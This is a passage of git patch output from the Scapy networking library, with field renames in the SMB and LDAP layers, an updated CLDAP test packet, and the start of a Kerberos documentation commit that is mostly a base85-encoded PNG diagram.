ASN1F_PACKET("equalityMatch", diff --git a/scapy/layers/smb.py b/scapy/layers/smb.py index 0794bb57e01..9995d9855ce 100644 --- a/scapy/layers/smb.py +++ b/scapy/layers/smb.py @@ -652,7 +652,7 @@ class SMBMailSlot(Packet): name = "SMB Mail Slot Protocol" fields_desc = [LEShortField("opcode", 1), LEShortField("priority", 1), - LEShortField("class", 2), + LEShortField("class_", 2), LEShortField("size", 135), StrNullField("name", "\\MAILSLOT\\NET\\GETDC660")] diff --git a/test/scapy/layers/ldap.uts b/test/scapy/layers/ldap.uts index 351e7fe3a6a..3495b81dfa6 100644 --- a/test/scapy/layers/ldap.uts +++ b/test/scapy/layers/ldap.uts @@ -100,7 +100,7 @@ assert raw(pkt2) == pkt.original = Basic CLDAP dissection & build test pkt = Ether(b'RT\x00\xbc\xe0=RT\x00y\xb1F\x08\x00E\x00\x00\xa5\x01\x1a\x00\x00\x80\x11\xc3H\xc0\xa8z\x91\xc0\xa8z\x03\xf1!\x01\x85\x00\x91o&0\x84\x00\x00\x00\x83\x02\x01\x01c\x84\x00\x00\x00z\x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\xa0\x84\x00\x00\x00S\xa3\x84\x00\x00\x00"\x04\tDnsDomain\x04\x15s4.howto.abartlet.net\xa3\x84\x00\x00\x00\x12\x04\x04Host\x04\nWINDOWS7-3\xa3\x84\x00\x00\x00\r\x04\x05NtVer\x04\x04\x16\x00\x00\x000\x84\x00\x00\x00\n\x04\x08Netlogon') -assert pkt.protocolOp.filter.filter.getfieldval("and")[2].filter.attributeType == b"NtVer" +assert pkt.protocolOp.filter.filter.getfieldval("and_")[2].filter.attributeType == b"NtVer" assert pkt.protocolOp.attributes[0].type == b"Netlogon" raw(pkt[CLDAP]) == b'0k\x02\x01\x01cf\x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x80G\x88"\x04\tDnsDomain\x04\x15s4.howto.abartlet.net\x88\x12\x04\x04Host\x04\nWINDOWS7-3\x88\r\x04\x05NtVer\x04\x04\x16\x00\x00\x000\n\x04\x08Netlogon' From 5a527a90ab3928e86497cd9ab0e5779159cf1244 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 22 Jul 2022 15:36:56 +0200 Subject: [PATCH 0853/1632] Kerberos: documentation + various fixes + demo (#3693) * MS-PAC, more key usage numbers * Properly document Kerberos * Fix command() for lists * More doc, examples, Kerberos AS client * Python 2.7 fix * Add great schema --- doc/scapy/graphics/kerberos/as_req_fast.png | Bin 0 -> 101605 bytes .../graphics/kerberos/wireshark_asreq.png | Bin 0 -> 27215 bytes doc/scapy/layers/kerberos.rst | 410 ++++++++++ scapy/asn1/ber.py | 6 +- scapy/asn1fields.py | 9 +- scapy/fields.py | 16 +- scapy/layers/kerberos.py | 705 +++++++++++++++--- scapy/libs/rfc3961.py | 23 +- scapy/packet.py | 5 + test/run_tests | 2 +- 10 files changed, 1040 insertions(+), 136 deletions(-) create mode 100644 doc/scapy/graphics/kerberos/as_req_fast.png create mode 100644 doc/scapy/graphics/kerberos/wireshark_asreq.png create mode 100644 doc/scapy/layers/kerberos.rst diff --git a/doc/scapy/graphics/kerberos/as_req_fast.png b/doc/scapy/graphics/kerberos/as_req_fast.png new file mode 100644 index 0000000000000000000000000000000000000000..180deac7a862a01932a2fa4c2d1a8cf64900c8dd GIT binary patch literal 101605 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 